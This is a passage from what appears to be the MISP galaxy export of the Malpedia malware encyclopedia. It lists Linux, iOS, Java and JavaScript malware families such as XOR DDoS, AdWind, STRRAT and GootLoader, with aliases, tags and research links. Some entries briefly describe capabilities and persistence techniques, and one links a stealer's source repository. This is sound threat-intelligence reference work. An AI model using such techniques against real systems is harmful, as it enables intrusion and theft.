According to 360 netlab, this backdoor was derived from the leaked CIA Hive project. It propagates via a vulnerability in F5 and communicates using SSL with a forged Kaspersky certificate.

The tag is: misp-galaxy:malpedia="xdr33"

xdr33 is also known as:

Table 2512. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.xdr33

https://blog.netlab.360.com/headsup_xdr33_variant_of_ciahive_emeerges/

XOR DDoS

Linux DDoS C&C Malware

The tag is: misp-galaxy:malpedia="XOR DDoS"

XOR DDoS is also known as:

  • XORDDOS

Table 2513. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos

https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/

https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/

https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html

https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/

https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/

https://en.wikipedia.org/wiki/Xor_DDoS

https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775

https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/

https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/

http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html

https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf

https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html

https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/

https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf

https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf

https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf

ZeroBot

ZeroBot is a Go-based botnet that spreads primarily through IoT and web application vulnerabilities. It is offered as malware as a service (MaaS) and infrastructure overlaps with DDoS-for-hire services seized by the FBI in December 2022.

The tag is: misp-galaxy:malpedia="ZeroBot"

ZeroBot is also known as:

  • ZeroStresser

Table 2514. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.zerobot

https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/

ZHtrap

The tag is: misp-galaxy:malpedia="ZHtrap"

ZHtrap is also known as:

Table 2515. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.zhtrap

https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/

Zollard

The tag is: misp-galaxy:malpedia="Zollard"

Zollard is also known as:

  • darlloz

Table 2516. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard

https://blogs.cisco.com/security/the-internet-of-everything-including-malware

ZuoRAT

According to Black Lotus Labs, ZuoRAT is a MIPS file compiled for SOHO routers that can enumerate a host and internal LAN, capture packets being transmitted over the infected device and perform person-in-the-middle attacks (DNS and HTTPS hijacking based on predefined rules).

The tag is: misp-galaxy:malpedia="ZuoRAT"

ZuoRAT is also known as:

Table 2517. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.zuo_rat

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/

AutoCAD Downloader

Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.

The tag is: misp-galaxy:malpedia="AutoCAD Downloader"

AutoCAD Downloader is also known as:

  • Acad.Bursted

  • Duxfas

Table 2518. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad

https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft

https://github.com/Hopfengetraenk/Fas-Disasm

GuiInject

The tag is: misp-galaxy:malpedia="GuiInject"

GuiInject is also known as:

Table 2520. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject

https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/

Phenakite

The tag is: misp-galaxy:malpedia="Phenakite"

Phenakite is also known as:

  • Dakkatoni

Table 2522. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ios.phenakite

https://malware4all.blogspot.com/2021/05/grab-your-own-copy-phenakite-ios.html

Postlo

The tag is: misp-galaxy:malpedia="Postlo"

Postlo is also known as:

Table 2524. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ios.postlo

https://twitter.com/opa334dev/status/1374754519268098051

WireLurker (iOS)

The iOS malware that is installed over USB by osx.wirelurker.

The tag is: misp-galaxy:malpedia="WireLurker (iOS)"

WireLurker (iOS) is also known as:

Table 2526. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

AdWind

Part of a Malware-as-a-Service platform. Used as a generic name for Java-based RATs.

Functionality:

  • collect general system and user information

  • terminate processes

  • log keystrokes

  • take screenshots and access the webcam

  • steal cached passwords from local or web forms

  • download and execute malware

  • modify the registry

  • download components

  • Denial of Service attacks

  • acquire VPN certificates

Initial infection vector:

  • Email with JAR files attached

  • Malspam URL to download the malware

Persistence: Run key (HKCU\Software\Microsoft\Windows\current version\run)

Hiding: uses attrib.exe

Notes on Adwind: the malware is not known to be proxy aware.

The tag is: misp-galaxy:malpedia="AdWind"

AdWind is also known as:

  • AlienSpy

  • Frutas

  • JBifrost

  • JSocket

  • Sockrat

  • UNRECOM

Table 2528. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind

https://research.checkpoint.com/malware-against-the-c-monoculture/

http://malware-traffic-analysis.net/2017/07/04/index.html

https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885

https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/

https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html

https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat

https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat

https://blogs.seqrite.com/evolution-of-jrat-java-malware/

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html

https://citizenlab.ca/2015/12/packrat-report/

Adzok

The tag is: misp-galaxy:malpedia="Adzok"

Adzok is also known as:

Table 2529. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.adzok

https://citizenlab.ca/2015/12/packrat-report/

DynamicRAT

DynamicRAT is a malware that is spread via email attachments and compromises the security of computer systems. Once running on a device, DynamicRAT establishes a persistent presence and gives attackers complete remote control. Its features include sensitive data exfiltration, hardware control, remote action, and the ability to perform DDoS attacks. In addition, DynamicRAT uses evasion and persistence techniques to evade detection and analysis by security solutions.

The tag is: misp-galaxy:malpedia="DynamicRAT"

DynamicRAT is also known as:

  • DYNARAT

Table 2533. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.dynamicrat

https://gi7w0rm.medium.com/dynamicrat-a-full-fledged-java-rat-1a2dabb11694

EpicSplit RAT

EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string "packet" as a packet delimiter.

The tag is: misp-galaxy:malpedia="EpicSplit RAT"

EpicSplit RAT is also known as:

Table 2534. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.epicsplit

https://www.zscaler.com/blogs/security-research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat

FEimea RAT

The tag is: misp-galaxy:malpedia="FEimea RAT"

FEimea RAT is also known as:

Table 2535. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat

https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/

IceRat

According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similar to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.

The tag is: misp-galaxy:malpedia="IceRat"

IceRat is also known as:

Table 2536. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.icerat

https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp

JavaDispCash

JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach-API on the ATM’s local application and the goal is to remotely control its operation. The malware’s primary feature is the ability to dispense cash. The malware also spawns a local port (65413) listening for commands from the attacker which needs to be located in the same internal network.

The tag is: misp-galaxy:malpedia="JavaDispCash"

JavaDispCash is also known as:

Table 2537. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash

https://twitter.com/r3c0nst/status/1111254169623674882

https://github.com/fboldewin/Libertad-y-gloria---A-Mexican-cyber-heist-story---CyberCrimeCon19-Singapore

jRAT

jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSDs. It also has functionality to participate in DDoS attacks as well as to perform click fraud. Note that the Adwind family is often mistakenly labeled as jRAT because of a red herring reference to jrat.io.

The tag is: misp-galaxy:malpedia="jRAT"

jRAT is also known as:

  • Jacksbot

Table 2539. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat

https://research.checkpoint.com/malware-against-the-c-monoculture/

https://www.eff.org/files/2018/01/29/operation-manul.pdf

https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/

https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered

https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/

jSpy

The tag is: misp-galaxy:malpedia="jSpy"

jSpy is also known as:

Table 2540. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy

https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/

Qarallax RAT

According to SpiderLabs, in May 2015 the "company" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).

The tag is: misp-galaxy:malpedia="Qarallax RAT"

Qarallax RAT is also known as:

Table 2542. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat

http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/

QRat

QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, …​), and it comes as a SaaS. For additional historical context, please see jar.qarallax.

The tag is: misp-galaxy:malpedia="QRat"

QRat is also known as:

  • Quaverse RAT

Table 2544. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/

https://www.digitrustgroup.com/java-rat-qrat/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/

https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT—​Remote-Access-as-a-Service/

Ratty

Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.

The tag is: misp-galaxy:malpedia="Ratty"

Ratty is also known as:

Table 2545. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty

https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

Sorillus RAT

Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99€ for lifetime access but is currently available at a discounted 19.99€. Conveniently, Sorillus can be purchased via a variety of cryptocurrencies. The tool’s creator and distributor, a YouTube user known as "Tapt", asserts that the tool is able to collect the following information from its target:

  • HardwareID

  • Username

  • Country

  • Language

  • Webcam

  • Headless

  • Operating system

  • Client Version

The tag is: misp-galaxy:malpedia="Sorillus RAT"

Sorillus RAT is also known as:

Table 2546. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.sorillus

https://abnormalsecurity.com/blog/tax-customers-sorillus-rat

STRRAT

STRRAT is a Java-based RAT, which makes extensive use of plugins to provide full remote access to an attacker, as well as credential stealing, key logging and additional plugins. The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging. It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird.

Since Version 1.2 and above, STRRAT was infamous for its ransomware-like behavior of appending the file name extension .crimson to files. Version 1.5 is notably more obfuscated and modular than previous versions, but the backdoor functions mostly remain the same: collect browser passwords, run remote commands and PowerShell, log keystrokes, among others. Version 1.5 of STRRAT Malware includes a proper encryption routine, though currently pretty simple to revert.

The tag is: misp-galaxy:malpedia="STRRAT"

STRRAT is also known as:

Table 2547. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://forensicitguy.github.io/strrat-attached-to-msi/

https://twitter.com/MsftSecIntel/status/1395138347601854465

https://www.jaiminton.com/reverse-engineering/strrat#

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain

https://www.jaiminton.com/reverse-engineering/strrat

https://any.run/cybersecurity-blog/strrat-malware-analysis-of-a-jar-archive/

https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1

https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://www.gdatasoftware.com/blog/strrat-crimson

https://isc.sans.edu/diary/rss/27798

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

SupremeBot

The tag is: misp-galaxy:malpedia="SupremeBot"

SupremeBot is also known as:

  • BlazeBot

Table 2548. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot

https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/

Verblecon

This malware seems to be used for attacks installing cryptocurrency miners on infected machines. Other indicators lead to the assumption that attackers may also use this malware for other purposes (e.g. stealing access tokens for the Discord chat app). Symantec describes this malware as complex and powerful: the malware is loaded as a server-side polymorphic JAR file.

The tag is: misp-galaxy:malpedia="Verblecon"

Verblecon is also known as:

Table 2549. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.verblecon

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord

AIRBREAK

AIRBREAK is a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.

The tag is: misp-galaxy:malpedia="AIRBREAK"

AIRBREAK is also known as:

  • Orz

Table 2550. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak

https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html

http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

BeaverTail

The tag is: misp-galaxy:malpedia="BeaverTail"

BeaverTail is also known as:

Table 2552. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.beavertail

https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/

BELLHOP

BELLHOP is a JavaScript backdoor interpreted using the native Windows Scripting Host (WSH). After performing some basic host information gathering, the BELLHOP dropper downloads a base64-encoded blob of JavaScript to disk and sets up persistence in three ways:

  • Creating a Run key in the Registry

  • Creating a RunOnce key in the Registry

  • Creating a persistent named scheduled task

BELLHOP communicates using HTTP and HTTPS with primarily benign sites such as Google Docs and PasteBin.

The tag is: misp-galaxy:malpedia="BELLHOP"

BELLHOP is also known as:

Table 2553. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

ChromeBack

GoSecure describes ChromeBack as a browser hijacker, redirecting traffic and serving advertisements to users.

The tag is: misp-galaxy:malpedia="ChromeBack"

ChromeBack is also known as:

Table 2555. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.chromeback

https://unit42.paloaltonetworks.com/chromeloader-malware/

https://www.gosecure.net/blog/2022/02/10/malicious-chrome-browser-extension-exposed-chromeback-leverages-silent-extension-loading/

ClearFake

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver further malware using the drive-by download technique. The malware leverages social engineering to trick the user into running a fake web browser update.

The tag is: misp-galaxy:malpedia="ClearFake"

ClearFake is also known as:

Table 2556. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.clearfake

https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/

https://rmceoin.github.io/malware-analysis/clearfake/

CryptoNight

WebAssembly-based crypto miner.

The tag is: misp-galaxy:malpedia="CryptoNight"

CryptoNight is also known as:

Table 2557. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight

https://twitter.com/JohnLaTwC/status/983011262731714565

https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec

DarkWatchman

Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA for C&C.

The tag is: misp-galaxy:malpedia="DarkWatchman"

DarkWatchman is also known as:

Table 2559. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman

https://www.prevailion.com/darkwatchman-new-fileness-techniques/

https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/

doenerium

Open source JavaScript info stealer with the capabilities of stealing crypto wallets, passwords and cookies, and modifying Discord clients: https://github.com/doener2323/doenerium

The tag is: misp-galaxy:malpedia="doenerium"

doenerium is also known as:

Table 2561. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.doenerium

https://twitter.com/0xToxin/status/1572612089901993985

https://perception-point.io/doenerium-malware/

Enrume

The tag is: misp-galaxy:malpedia="Enrume"

Enrume is also known as:

  • Ransom32

Table 2562. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.enrume

https://blog.emsisoft.com/de/21077/meet-ransom32-the-first-javascript-ransomware/

FakeUpdateRU

FakeUpdateRU is a malicious JavaScript code injected into compromised websites to deliver further malware using the drive-by download technique. The malicious code displays a copy of the Google Chrome web browser download page and redirects the user to the download of a next-stage payload.

The tag is: misp-galaxy:malpedia="FakeUpdateRU"

FakeUpdateRU is also known as:

Table 2564. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdateru

https://blog.sucuri.net/2023/10/fakeupdateru-chrome-update-infection-spreads-trojan-malware.html

FAKEUPDATES

FAKEUPDATES is a downloader written in JavaScript that communicates via HTTP. Supported payload types include executables and JavaScript. It writes the payloads to disk prior to launching them. FAKEUPDATES has led to further compromise via additional malware families that include CHTHONIC, DRIDEX, EMPIRE, KOADIC, DOPPELPAYMER, and AZORULT.

FAKEUPDATES has been heavily used by UNC1543, a financially motivated group.

The tag is: misp-galaxy:malpedia="FAKEUPDATES"

FAKEUPDATES is also known as:

  • FakeUpdate

  • SocGholish

Table 2565. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdates

https://www.lac.co.jp/lacwatch/report/20220407_002923.html

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://experience.mandiant.com/trending-evil/p/1

https://twitter.com/MsftSecIntel/status/1522690116979855360

https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/

https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems

https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html

https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

https://www.menlosecurity.com/blog/increase-in-attack-socgholish

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt

https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends

https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/

https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/

https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm

https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/

https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/

GootLoader

According to PCrisk, they discovered GootLoader malware while examining legitimate but compromised websites (mainly websites managed using WordPress). It was found that GootLoader is used to infect computers with additional malware. Cybercriminals using GootLoader seek to trick users into unknowingly downloading and executing the malware by disguising it as a document or other file.

The tag is: misp-galaxy:malpedia="GootLoader"

GootLoader is also known as:

Table 2566. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader

https://dinohacks.blogspot.com/2022/06/loading-gootloader.html

https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf

https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity

https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/

https://gootloader.wordpress.com/2023/01/05/what-is-gootloader/

https://www.esentire.com/web-native-pages/gootloader-unloaded

https://experience.mandiant.com/trending-evil/p/1

https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/

https://github.com/struppigel/hedgehog-tools/tree/main/gootloader

https://securityintelligence.com/x-force/gootbot-gootloaders-new-approach-to-post-exploitation/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/gootloader-why-your-legal-document-search-may-end-in-misery/

https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader

https://redcanary.com/blog/gootloader

https://community.riskiq.com/article/f5d5ed38

https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/

https://www.kroll.com/en/insights/publications/cyber/deep-dive-gootloader-malware-infection-chain

https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf

https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations

https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html

https://www.reliaquest.com/blog/gootloader-infection-credential-access/

https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/

https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/

https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique

https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

grelos

grelos is a skimmer used for magecart-style attacks.

The tag is: misp-galaxy:malpedia="grelos"

grelos is also known as:

Table 2567. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos

https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745

https://community.riskiq.com/article/8c4b4a7a

https://www.riskiq.com/blog/labs/magecart-medialand/

Griffon

GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.

The tag is: misp-galaxy:malpedia="Griffon"

Griffon is also known as:

  • Harpy

Table 2568. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://www.mandiant.com/resources/evolution-of-fin7

https://twitter.com/ItsReallyNick/status/1059898708286939136

inter

The tag is: misp-galaxy:malpedia="inter"

inter is also known as:

Table 2569. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.inter

https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html

Jeniva

The tag is: misp-galaxy:malpedia="Jeniva"

Jeniva is also known as:

Table 2570. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.jeniva

https://imp0rtp3.wordpress.com/2021/08/12/tetris/

Jetriz

The tag is: misp-galaxy:malpedia="Jetriz"

Jetriz is also known as:

Table 2571. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.jetriz

https://imp0rtp3.wordpress.com/2021/08/12/tetris/

LNKR

The LNKR trojan is a malicious browser extension that monitors the websites visited by the user, looking for pages with administrative privileges such as blog sites or web-based virtual learning environments. When the administrative user posts to the page, the infected extension executes a stored cross-site scripting attack and injects malicious JavaScript into the legitimate HTML of the page. This is used to redirect the second-party visitors of the site to both benign and malicious domains.

The tag is: misp-galaxy:malpedia="LNKR"

LNKR is also known as:

Table 2574. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr

https://github.com/Zenexer/lnkr

https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/

https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md

https://www.riskiq.com/blog/labs/lnkr-browser-extension/

magecart

